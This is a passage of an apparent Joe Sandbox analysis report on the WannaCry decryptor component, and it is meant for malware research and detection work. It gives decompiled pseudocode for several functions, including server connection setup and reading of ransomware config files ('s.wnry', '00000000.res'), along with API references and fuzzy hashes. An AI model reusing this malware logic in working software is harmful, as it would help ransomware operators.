                                                      0x004040c6
                                                      0x004040ce
                                                      0x004040d5
                                                      0x004040da
                                                      0x004040dd
                                                      0x004040e4
                                                      0x004040eb
                                                      0x004040f0
                                                      0x004040f6
                                                      0x004040fb
                                                      0x004040fe
                                                      0x0040410f
                                                      0x00404112
                                                      0x00404115
                                                      0x00404120
                                                      0x00404129
                                                      0x0040412c
                                                      0x00404139
                                                      0x00404143

                                                      APIs
                                                      • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                      • #860.MFC42(00421798), ref: 004040F6
                                                      • #858.MFC42(00000000,00421798), ref: 004040FE
                                                      • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540CursorLoad$#567#858#860
                                                      • String ID: 0ZA
                                                      • API String ID: 2440951079-2594568282
                                                      • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                                      • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407CB0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E00407CB0() {
				char _v8;
				intOrPtr _v16;
				char _v28;
				char _v40;
				void* _v104;
				void* _v168;
				char _v260;
				void* _v264;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t35;

				_push(0xffffffff);
				_push(E00413F77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t35 = _t34 - 0xfc;
				E004030E0( &_v260, 0);
				_v8 = 0;
				L00412B72();
				_v8 = 1;
				_t24 =  &_v28;
				_v28 = 0x415c00;
				 *_t35 = _t24;
				_v8 = 5;
				L00412D52();
				_v28 = 0x415bec;
				 *_t35 =  &_v40;
				_v40 = 0x415c00;
				_v8 = 6;
				L00412D52();
				_v40 = 0x415bec;
				_v8 = 2;
				L00412D4C();
				_v8 = 1;
				L00412D3A();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return _t24;
			}














                                                      0x00407cb0
                                                      0x00407cb2
                                                      0x00407cbd
                                                      0x00407cbe
                                                      0x00407cc5
                                                      0x00407cd1
                                                      0x00407cda
                                                      0x00407ce5
                                                      0x00407cea
                                                      0x00407cf5
                                                      0x00407cfc
                                                      0x00407d07
                                                      0x00407d12
                                                      0x00407d1a
                                                      0x00407d26
                                                      0x00407d31
                                                      0x00407d35
                                                      0x00407d47
                                                      0x00407d4f
                                                      0x00407d5b
                                                      0x00407d66
                                                      0x00407d6e
                                                      0x00407d77
                                                      0x00407d7f
                                                      0x00407d88
                                                      0x00407d93
                                                      0x00407d9f
                                                      0x00407dac

                                                      APIs
                                                        • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      • #2514.MFC42 ref: 00407CE5
                                                      • #2414.MFC42 ref: 00407D1A
                                                      • #2414.MFC42 ref: 00407D4F
                                                      • #616.MFC42 ref: 00407D6E
                                                      • #693.MFC42 ref: 00407D7F
                                                      • #641.MFC42 ref: 00407D93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#567$#2514#324#616#641#693
                                                      • String ID: [A$[A
                                                      • API String ID: 3779294304-353784214
                                                      • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                                      • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C240 Relevance: 13.7, APIs: 9, Instructions: 195windowfileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v34;
				long _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v65;
				char _v68;
				int _v76;
				char _v77;
				void* _t57;
				signed int _t76;
				struct HWND__* _t92;
				long _t133;
				struct _IO_FILE* _t136;
				struct HWND__* _t138;
				signed int _t140;
				int _t141;
				intOrPtr _t143;
				void* _t144;

				_push(0xffffffff);
				_push(E004142DB);
				 *[fs:0x0] = _t143;
				E00413060(0x240c, __ecx,  *[fs:0x0]);
				_push(_t140);
				E0040DBB0( &_v0, 0x1000);
				_a9220 = 0;
				_push( &_v4);
				_t141 = _t140 | 0xffffffff;
				_t57 = E0040BED0(_a9228, _a9232, 0xc);
				_t144 = _t143 + 0x10;
				if(_t57 == 0) {
					_t138 = _a9272;
					if(_t138 != 0) {
						SendMessageA(_t138, 0x4e20, 0, 0);
					}
					_push(8);
					_push(_a9240);
					E0040DC00( &_v0);
					_v12 = _a9236;
					_push(4);
					_push( &_v12);
					E0040DC00( &_v8);
					E0040DD00( &_v16, _a9240);
					E0040DD00( &_v20, _a9240);
					_push(1);
					_push( &_v34);
					_v34 = _a9240;
					E0040DC00( &_v24);
					_t133 = _a9220;
					_push(4);
					_push( &_v36);
					_v36 = _t133;
					E0040DC00( &_v32);
					_push(_t133);
					_push(_a9208);
					E0040DC00( &_v40);
					_push(0);
					_push(E0040DD40( &_v48));
					_push(E0040DD30( &_v48));
					_push(7);
					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0, 0);
						}
						_push( &_v64);
						_push( &_a4060);
						_v64 = 0x13ec;
						_push( &_v65);
						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
							if(_v77 == 7) {
								_t141 = 0;
								if(_v76 > 0) {
									_t136 = fopen(_a9200, "wb");
									_t144 = _t144 + 8;
									if(_t136 != 0) {
										fwrite( &_a4048, 1, _v76, _t136);
										fclose(_t136);
										_t144 = _t144 + 0x14;
										_t141 = 1;
									}
								}
							}
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, _t141, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							_a9156 = 0xffffffff;
							L23:
							E0040DBF0( &_v68);
							_t76 = _t141;
						} else {
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							_a9156 = 0xffffffff;
							_t76 = E0040DBF0( &_v68) | 0xffffffff;
						}
						goto L24;
					} else {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
						_a9168 = 0xffffffff;
						_t76 = E0040DBF0( &_v56) | 0xffffffff;
						L24:
						 *[fs:0x0] = _a9148;
						return _t76;
					}
				}
				_t92 = _a9272;
				if(_t92 != 0) {
					SendMessageA(_t92, 0x4e20, _t141, 0);
				}
				_a9224 = _t141;
				goto L23;
			}































                                                      0x0040c240
                                                      0x0040c248
                                                      0x0040c253
                                                      0x0040c25a
                                                      0x0040c260
                                                      0x0040c26c
                                                      0x0040c283
                                                      0x0040c28e
                                                      0x0040c293
                                                      0x0040c296
                                                      0x0040c29b
                                                      0x0040c2a0
                                                      0x0040c2c8
                                                      0x0040c2d7
                                                      0x0040c2e3
                                                      0x0040c2e3
                                                      0x0040c2ec
                                                      0x0040c2ee
                                                      0x0040c2f3
                                                      0x0040c303
                                                      0x0040c307
                                                      0x0040c309
                                                      0x0040c30e
                                                      0x0040c31f
                                                      0x0040c330
                                                      0x0040c340
                                                      0x0040c342
                                                      0x0040c347
                                                      0x0040c34b
                                                      0x0040c350
                                                      0x0040c35b
                                                      0x0040c35d
                                                      0x0040c362
                                                      0x0040c366
                                                      0x0040c372
                                                      0x0040c373
                                                      0x0040c378
                                                      0x0040c382
                                                      0x0040c38f
                                                      0x0040c39f
                                                      0x0040c3a0
                                                      0x0040c3a7
                                                      0x0040c3e2
                                                      0x0040c3ee
                                                      0x0040c3ee
                                                      0x0040c3fa
                                                      0x0040c402
                                                      0x0040c403
                                                      0x0040c411
                                                      0x0040c417
                                                      0x0040c452
                                                      0x0040c458
                                                      0x0040c45c
                                                      0x0040c470
                                                      0x0040c472
                                                      0x0040c477
                                                      0x0040c489
                                                      0x0040c48f
                                                      0x0040c494
                                                      0x0040c497
                                                      0x0040c497
                                                      0x0040c477
                                                      0x0040c45c
                                                      0x0040c49e
                                                      0x0040c4a9
                                                      0x0040c4a9
                                                      0x0040c4b3
                                                      0x0040c4b6
                                                      0x0040c4c1
                                                      0x0040c4c5
                                                      0x0040c4ca
                                                      0x0040c419
                                                      0x0040c41b
                                                      0x0040c427
                                                      0x0040c427
                                                      0x0040c431
                                                      0x0040c438
                                                      0x0040c448
                                                      0x0040c448
                                                      0x00000000
                                                      0x0040c3a9
                                                      0x0040c3ab
                                                      0x0040c3b7
                                                      0x0040c3b7
                                                      0x0040c3c1
                                                      0x0040c3c8
                                                      0x0040c3d8
                                                      0x0040c4cc
                                                      0x0040c4d7
                                                      0x0040c4e4
                                                      0x0040c4e4
                                                      0x0040c3a7
                                                      0x0040c2a2
                                                      0x0040c2ab
                                                      0x0040c2b6
                                                      0x0040c2b6
                                                      0x0040c2bc
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                                      • fopen.MSVCRT ref: 0040C46B
                                                      • fwrite.MSVCRT ref: 0040C489
                                                      • fclose.MSVCRT ref: 0040C48F
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823fclosefopenfwrite
                                                      • String ID:
                                                      • API String ID: 1132507536-0
                                                      • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                                      • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00401140() {
				intOrPtr _v4;
				void* _t17;
				struct HWND__* _t18;
				void* _t23;
				intOrPtr _t24;

				_t23 = _t17;
				L00412CB0();
				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
				_t18 =  *(_t23 + 0x80);
				SendMessageA(_t18, 0x401, 0, 0x280000);
				_push(_t18);
				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
				_v4 = _t24;
				L00412CAA();
				E00401970("Connecting to server...");
				 *(_t23 + 0xa8) = 0;
				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
				}
				return 1;
			}








                                                      0x00401143
                                                      0x00401145
                                                      0x00401160
                                                      0x00401162
                                                      0x00401175
                                                      0x00401177
                                                      0x00401178
                                                      0x00401184
                                                      0x0040118d
                                                      0x00401194
                                                      0x004011a9
                                                      0x004011b3
                                                      0x004011c1
                                                      0x004011d7
                                                      0x004011d7
                                                      0x004011e5

                                                      APIs
                                                      • #4710.MFC42 ref: 00401145
                                                      • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                                      • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                                      • #537.MFC42(Connecting to server...), ref: 0040118D
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                                      • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
                                                      Strings
                                                      • Connecting to server..., xrefs: 00401188
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                                      • String ID: Connecting to server...
                                                      • API String ID: 3305248171-1849848738
                                                      • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                                      • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402F10 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 2613176527-0
                                                      • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                                      • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407F80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 20%
                                                      			E00407F80(void* __ecx) {
				struct _IO_FILE* _t24;
				void* _t30;
				void* _t37;
				void* _t38;
				signed int _t45;
				signed int _t48;
				signed int _t51;
				unsigned int _t53;
				signed int _t54;
				void* _t66;
				struct _IO_FILE* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;

				_t79 = __ecx;
				 *((char*)(_t81 + 0xc)) = 0;
				memset(_t81 + 0xd, 0, 0xc << 2);
				_t82 = _t81 + 0xc;
				asm("stosb");
				 *((intOrPtr*)(_t82 + 0x40)) = 0;
				memset(_t82 + 0x44, 0, 0x21 << 2);
				_t24 = fopen("00000000.res", "rb");
				_t76 = _t24;
				_t84 = _t82 + 0x14;
				_t89 = _t76;
				if(_t76 != 0) {
					fread(_t84 + 0x48, 0x88, 1, _t76);
					fclose(_t76);
					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
					_t45 = _t84 + 0x60;
					_push(_t84 + 0x2c);
					_t66 = _t79 + 0x5f0;
					_push("+++");
					_push(_t45);
					_push(_t66);
					_t30 = E0040C4F0(_t38, _t45, _t89);
					_t85 = _t84 + 0x30;
					_t77 = _t30;
					E0040C670();
					_t90 = _t77 - 0xffffffff;
					if(_t77 == 0xffffffff) {
						_push(_t85 + 0xc);
						_push("+++");
						_push(_t85 + 0x40);
						_push(_t66);
						_t37 = E0040C4F0(_t38, _t45, _t90);
						_t85 = _t85 + 0x10;
						_t77 = _t37;
					}
					_t24 = E0040C670();
					if(_t77 == 1) {
						_t24 = 0;
						asm("repne scasb");
						_t48 =  !(_t45 | 0xffffffff) - 1;
						if(_t48 >= 0x1e) {
							asm("repne scasb");
							_t51 =  !(_t48 | 0xffffffff) - 1;
							if(_t51 < 0x32) {
								asm("repne scasb");
								_t53 =  !(_t51 | 0xffffffff);
								_t78 = _t85 + 0xc - _t53;
								_t54 = _t53 >> 2;
								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
								return E00401A10(_t79 + 0x50c, 0);
							}
						}
					}
				}
				return _t24;
			}





















                                                      0x00407f88
                                                      0x00407f96
                                                      0x00407f9b
                                                      0x00407f9b
                                                      0x00407f9d
                                                      0x00407fa9
                                                      0x00407fbb
                                                      0x00407fbd
                                                      0x00407fc3
                                                      0x00407fc5
                                                      0x00407fc8
                                                      0x00407fca
                                                      0x00407fdd
                                                      0x00407fe4
                                                      0x00407ffd
                                                      0x00408006
                                                      0x0040800a
                                                      0x0040800b
                                                      0x00408011
                                                      0x00408016
                                                      0x00408017
                                                      0x00408018
                                                      0x0040801d
                                                      0x00408020
                                                      0x00408022
                                                      0x00408027
                                                      0x0040802a
                                                      0x00408034
                                                      0x00408035
                                                      0x0040803a
                                                      0x0040803b
                                                      0x0040803c
                                                      0x00408041
                                                      0x00408044
                                                      0x00408044
                                                      0x00408046
                                                      0x0040804e
                                                      0x00408057
                                                      0x00408059
                                                      0x0040805d
                                                      0x00408061
                                                      0x0040806a
                                                      0x0040806e
                                                      0x00408072
                                                      0x0040807b
                                                      0x0040807d
                                                      0x00408089
                                                      0x00408093
                                                      0x004080a0
                                                      0x00000000
                                                      0x004080a7
                                                      0x00408072
                                                      0x00408061
                                                      0x0040804e
                                                      0x004080b3

                                                      APIs
                                                      • fopen.MSVCRT ref: 00407FBD
                                                      • fread.MSVCRT ref: 00407FDD
                                                      • fclose.MSVCRT ref: 00407FE4
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                                        • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy$fclosefopenfread
                                                      • String ID: +++$00000000.res$s.wnry
                                                      • API String ID: 3363958884-869915597
                                                      • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                                      • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401220 Relevance: 10.6, APIs: 7, Instructions: 53windowtimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401220(void* __ecx, long _a4) {
				long _t11;
				void* _t26;

				_t11 = _a4;
				_t26 = __ecx;
				if(_t11 != 0x3e9) {
					L8:
					L00412CBC();
					return _t11;
				}
				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
					KillTimer( *(_t26 + 0x20), 0x3e9);
					L00412B66();
				}
				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
				}
				_t11 =  *(_t26 + 0xa0);
				if(_t11 == 0) {
					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
					if(_t11 == 0xf) {
						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
					}
				}
				goto L8;
			}





                                                      0x00401220
                                                      0x0040122b
                                                      0x0040122d
                                                      0x004012c2
                                                      0x004012c4
                                                      0x004012cb
                                                      0x004012cb
                                                      0x00401241
                                                      0x00401253
                                                      0x0040125e
                                                      0x00401266
                                                      0x00401266
                                                      0x00401283
                                                      0x00401295
                                                      0x00401295
                                                      0x00401297
                                                      0x0040129f
                                                      0x004012b1
                                                      0x004012b6
                                                      0x004012b8
                                                      0x004012b8
                                                      0x004012b6
                                                      0x00000000

                                                      APIs
                                                      • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                                      • KillTimer.USER32(?,000003E9), ref: 0040125E
                                                      • #4853.MFC42 ref: 00401266
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                                      • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                                      • #2379.MFC42 ref: 004012C4
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
